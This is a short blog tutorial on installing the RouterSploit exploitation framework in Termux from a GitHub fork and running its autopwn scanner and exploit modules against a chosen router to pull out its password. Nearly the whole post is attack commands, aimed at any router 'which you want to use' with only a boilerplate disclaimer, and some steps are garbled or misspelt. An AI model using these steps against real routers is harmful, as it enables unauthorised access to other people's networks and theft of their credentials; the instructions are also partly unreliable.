Featured
- Get link
- X
- Other Apps
How to install RouterSploit in Termux
HOW TO DOWNLOAD AND INSTALL ROUTERSPLOIT ON TERMUX?
After successfully download and install Termux give these following commands
$ pkg update && pkg upgrade
$ pkg install python -y
$ pkg install python2 -y
[Here python2 have no any work but when you download and install routersploit you get many errors. So solve many errors problem you can download python2]
$ pkg install git
$ pkg install pip
$ git clone https://github.com/reverse-shell/routersploit
[ Copy this link 👉 https://github.com/reverse-shell/routersploit ]
$ ls
$ cd routersploit
$ pip2 install -r requirement.txt
$ pip2 install requests
[ It will be taken few minutes for install. Don’t skip it ]
$ pip install future
$ python rsf.py
[ Then routersploit tool is install successfully]
Now your routersploit tool is ready for use.
rsf > show all
rsf > use scanners/autopwn
rsf > show options
rsf > set target { your ip}
[ For get ip, go to settings>wifi
Then copy ip of router which you want to use]
rsf > set http_port 80 vulnerability
rsf > run
Now you vulnerability process get start. This process take few minutes to scan Vulnerability to this router. After scan Vulnerability you can copy this password which interface is like [+]
Then give commands
rsf > use {your vulnerability text }
rsf > set target {router IP }
rsf > run
Disclaimer : This post is just for educational purpose try it on your own risk if you cause any harm to your device using this then i will not be responsible for it for any enquiry contact me on my social media handles!!!
Instagram: harsh11_x
Twitter: harshdev_11
Join our Telegram Channel : Join
For latest updates and best content
- Get link
- X
- Other Apps
Popular Posts
How to perform bruteforce attack using Termux/Linux/Kali/Ubuntu
- Get link
- X
- Other Apps
Comments
Post a Comment